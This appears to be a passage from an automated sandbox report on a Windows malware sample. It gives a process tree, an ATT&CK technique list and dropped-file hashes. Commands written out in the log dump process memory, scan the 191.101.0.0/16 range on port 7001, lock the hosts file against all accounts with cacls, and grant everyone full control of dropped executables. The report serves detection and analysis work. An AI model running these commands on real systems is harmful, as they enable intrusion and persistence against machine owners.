- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 1260 C:\Windows\TEMP\ctvlnlili\1260.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3692 C:\Windows\TEMP\ctvlnlili\3692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 4636 C:\Windows\TEMP\ctvlnlili\4636.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3304 C:\Windows\TEMP\ctvlnlili\3304.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2204 C:\Windows\TEMP\ctvlnlili\2204.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ctvlnlili\rzvrtrlue\scan.bat2⤵PID:5028
-
C:\Windows\ctvlnlili\rzvrtrlue\gepmrvmba.exegepmrvmba.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4052
-
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 5028 C:\Windows\TEMP\ctvlnlili\5028.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6344
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3032 C:\Windows\TEMP\ctvlnlili\3032.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:3756
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4504
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:60
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5112
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:6400
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1936
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4364,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:81⤵PID:3116
-
C:\Windows\SysWOW64\yqiwma.exeC:\Windows\SysWOW64\yqiwma.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2008
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\ncnrnqz.exe1⤵PID:3180
-
C:\Windows\ime\ncnrnqz.exeC:\Windows\ime\ncnrnqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4620
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F1⤵PID:1056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3972
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F2⤵PID:4468
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F1⤵PID:2296
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3324
-
-
C:\Windows\system32\cacls.execacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F2⤵PID:3840
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\ncnrnqz.exe1⤵PID:4988
-
C:\Windows\ime\ncnrnqz.exeC:\Windows\ime\ncnrnqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6356
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F1⤵PID:5360
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1084
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F2⤵PID:6172
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F1⤵PID:5672
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5456
-
-
C:\Windows\system32\cacls.execacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F2⤵PID:5076
-
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2): Windows Service (2)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2): Windows Service (2)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads
-
Filesize 95KB
MD5 86316be34481c1ed5b792169312673fd
SHA1 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA256 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA512 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize 275KB
MD5 4633b298d57014627831ccac89a2c50b
SHA1 e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256 b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA512 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize 8.7MB
MD5 1d3d84528cd7e2bbdb9408dbc0bb6a24
SHA1 e1a50fb9b9c5b3c49ee2d36ae341bc76c0264a3f
SHA256 0b9bd4f3155319b761bce9bc3d342b050a862e4f0df74031983825300381d039
SHA512 d7629125d2560f28825335013cde089bee481b38c204b2d0d09502aaf1073a17c5961475c84c3cd9cb2ec47b0ca6550658893714edb09b131b7b72a7bb6b9f80
-
Filesize 26.0MB
MD5 8524ede669cd04382dd97d54b7f94eec
SHA1 5d73e7a69834febf83c76e1385ce53241a4bd351
SHA256 d0b13b476e27fa006bd0360330aac203c13de686b21ed5c0f1a4913e5aa7b43f
SHA512 afc99c6d7380020ef336c5a9c983b4b22d1a58652358bf432ba483e37995404dc99d62834ab5eea6fa234aee015ae750d275d1135293dfea0c56dd3fdaed38c2
-
Filesize 4.2MB
MD5 6db067f89734159704b6372be48a37fd
SHA1 e36fa107fdee4aa95769a41b4bd5fdeda66eb76e
SHA256 ee7fb8cf13f437516a33c6eb4e30eef972bc24bd1f02c3660dfe1b626b48426b
SHA512 cf5a94e9a0b2e17b56d6004e7b4652895014a7fdca433f30ae82993fff3325fc7c1bead06f7e5f234912fa6df8725bf478bb78432f622be2fa5f857d0f598e43
-
Filesize 4.0MB
MD5 a00caf68af5ad06e965955fc6952ce26
SHA1 514000bb89280625cddd8cd3da6106eab3e71d4f
SHA256 a169787caef47cf53787f3e7eea630cbfc6c343ea428f97321f6c78274b0b177
SHA512 14e38f8a4ade3dd377bc80a0dda0aa954c32455362a01b145e9d28e21674fade755503344ed7d24ab2f965f40b7eed5dd849338809e05bce2d5ff932430c8e91
-
Filesize 2.9MB
MD5 ce7c7157b12d6b1a36fe9dc09cebc8b7
SHA1 0e7a7002d6cb9b14de63051db116a442bf316c82
SHA256 e4c660f1175601a0b35e4c51ae59246ff90aabf85692df0f3cace22508beba59
SHA512 99d0bdf2ab47db0d4f572190af192cdbfd0854ae35e0907d8f60f6364864537956e2845717aa676e38ae0476124ba8443f37efccfeadeb293f6c458c6b17634f
-
Filesize 7.4MB
MD5 f50d13cb5268a2aff23483835c65f2f0
SHA1 3167f93e6645551859f7a2b627256753568b6143
SHA256 8ff31cd5028a6b0bfc5c5e7626b35e1a671d48f74bfc53d6cfa6c6443ace5d07
SHA512 39b30f73d681760603efc4f52717e97e2c340a682048f5548583707e715c59d986fb3f2495a198fc16dac51b8c655ab70cedda920766ed1201730eeac4cefd94
-
Filesize 818KB
MD5 49646c57011396ce7b90acda845d9a3c
SHA1 bede522ab6990773ea62066165add069a5b87b19
SHA256 0b51f9f7ee208a42923d7269e3e9fc5b065a114b9c14e4f6b8ca0fd2471723ad
SHA512 d06c861eb9048fa0126413c4b59be1c6709cc8eed390e7d8c22878690a7ab9c98e45479511df3447d7e5dac7265a965dab5e95257310d0056b37700a59acd7ae
-
Filesize 33.2MB
MD5 f26c7e638e92a52484c13caf4549d301
SHA1 f955669df79c00945a75f615039267c91db3ae33
SHA256 400022e3036c2c418e80f704627f46e4b1d672ae33fbf58efb29f1f280059974
SHA512 df32ef2efd2be1f0abd373334a35845de41c9a121abe9bbd9c371984900c02bce2b64253ba4709e315d74a761303476a4ac76a0876fe97540586fb9c849cff05
-
Filesize 27.5MB
MD5 12b34c6f436bf0f1346ffd5404d3661d
SHA1 b32e667191c7f880c810a7176ab81cefae90e598
SHA256 91418434c3f0957446f0d5226166730d48655d84c6f0e185fed2c2c95a3bab9e
SHA512 9bf471a596463cfec6bce5daada93a3725ba3ba2e958444ceca36585102fa46673c2476f34831f64e7ecb416847aebe3cb68eb2ecb361be2fb897e844797fc26
-
Filesize 2.7MB
MD5 0d524e967027770a3f7c9c4c6f8923a4
SHA1 6b4643c6aacca967a89552b474b7b4bb58867b8d
SHA256 969587d4423e97f5a6dc4d9e62574ea788aa7992659a54e7bc86fc4f8ed6c175
SHA512 9aee34b170fb34a5dd6c6835f480c0efc7ca74f65bdde3b7d47bdc6d8e2c3a8fdba8e62ca02bb71e4ff746ce1e62bea798e343110faa6641b3a3a51bee6c3e17
-
Filesize 21.2MB
MD5 6e8e6bfdeba067c86e6237477d33761c
SHA1 8cd35668b98447fceaff24e6d4aa5c34a3f71bae
SHA256 ffdefacaa235fc8a0042b9b8cde7a8012e5323c7c385ae5ba786788f2ce823a1
SHA512 554be954c472db7d9a06f0a9e9c22b73b230984fbab171750b1d700d4f52d5f6f56112724056483243074ebea91cdd1083fa5ab966eb916aaff2b7a17b00d536
-
Filesize 8.5MB
MD5 30dc1e2781c7eb0229b1c5db8728fb98
SHA1 181af92a72077591820de8de1d2aae47d9e763d5
SHA256 6b7aa686bcd8e5a21fe8eed8a0499d9e2a10bf1ff8f16bc15a3b68f1e30dc62d
SHA512 e038ae344402f769ec8b13eb3d35314ee7d018c9133870c4687896dc67ff9ca0ed09e5b5af5e9af7231d3d18f04dd2a5e9981539a126d0a90e2ba01c7d22585d
-
Filesize 1.2MB
MD5 1e24fde6b3327b3b3deca0c64fc0732c
SHA1 6f926277397cef74a0c46c6175905ea191d6bcad
SHA256 607a52498be3eaae216c2f0dac12e0b4577e7070f6b22ff28b6860c56bbb75e1
SHA512 9d63d520f9ee32d1b9bbe9da7bbf5d00198cbb733c417ea6b6a5140f8f77c6eb59bbe548b6ab2cf40a45169048462fffeecbad293ce6c597ef6f64581f538ac4
-
Filesize 45.7MB
MD5 501d63126c961970990282cf95a90dfc
SHA1 90bb108d3ec752d9067ff3d714bb74c4a375bc65
SHA256 17e370be44e511e5b5991313cfeec7466bd6daa70324b78f039e171b59ea41b0
SHA512 60871a5e8c744556f7190b65c9ed57fa276b5063adef8ef90a99587ef0cc95bda6b0143a66fdea1b055b875cb060fa98dd3c6525a793564a2d640d6eb0ad7ee1
-
Filesize 2.0MB
MD5 d18230cea201e4e46992765d7e2efa98
SHA1 af10670bb633523480a6427cc04953e395e2df99
SHA256 4aef71d7afdff23b65384fd7c20a5d88dae6bbd5e18c85665214954657f765c1
SHA512 9483526662360848209f57a6dd2684fcb52fb9afa9981e5c1b0a46e678c574aeac668629f5527aabbb8d3eefd3caffb82dcde9d9a3f24b1a6c7c997858074077
-
Filesize 693B
MD5 f2d396833af4aea7b9afde89593ca56e
SHA1 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256 d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA512 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize 126KB
MD5 e8d45731654929413d79b3818d6a5011
SHA1 23579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256 a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512 df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize 11KB
MD5 2ae993a2ffec0c137eb51c8832691bcb
SHA1 98e0b37b7c14890f8a599f35678af5e9435906e1
SHA256 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA512 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize 6KB
MD5 b648c78981c02c434d6a04d4422a6198
SHA1 74d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA256 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize 343KB
MD5 2b4ac7b362261cb3f6f9583751708064
SHA1 b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256 a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512 c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize 72KB
MD5 cbefa7108d0cf4186cdf3a82d6db80cd
SHA1 73aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA256 7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512 b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize 381KB
MD5 fd5efccde59e94eec8bb2735aa577b2b
SHA1 51aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256 441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA512 74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize 332KB
MD5 ea774c81fe7b5d9708caa278cf3f3c68
SHA1 fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA256 4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA512 7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize 424KB
MD5 e9c001647c67e12666f27f9984778ad6
SHA1 51961af0a52a2cc3ff2c4149f8d7011490051977
SHA256 7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA512 56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize 9.1MB
MD5 a5d01a4f4e42451c38ad484115c3988f
SHA1 d837ccc8e38dde0c235129ff6b4018fa2e552e52
SHA256 0d24654b670633b65402b2ff56b0a6262eb2810560594db8287b113285bd6956
SHA512 a336b8dbbcc788a4a2f329998ddc6f67128c87e4aa01ec60a2c08d3393096d4d0609b046fc231b303c47f412c487414ddf459150698a240bfdd97c0232ac0b9d
-
Filesize 1KB
MD5 c838e174298c403c2bbdf3cb4bdbb597
SHA1 70eeb7dfad9488f14351415800e67454e2b4b95b
SHA256 1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512 c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376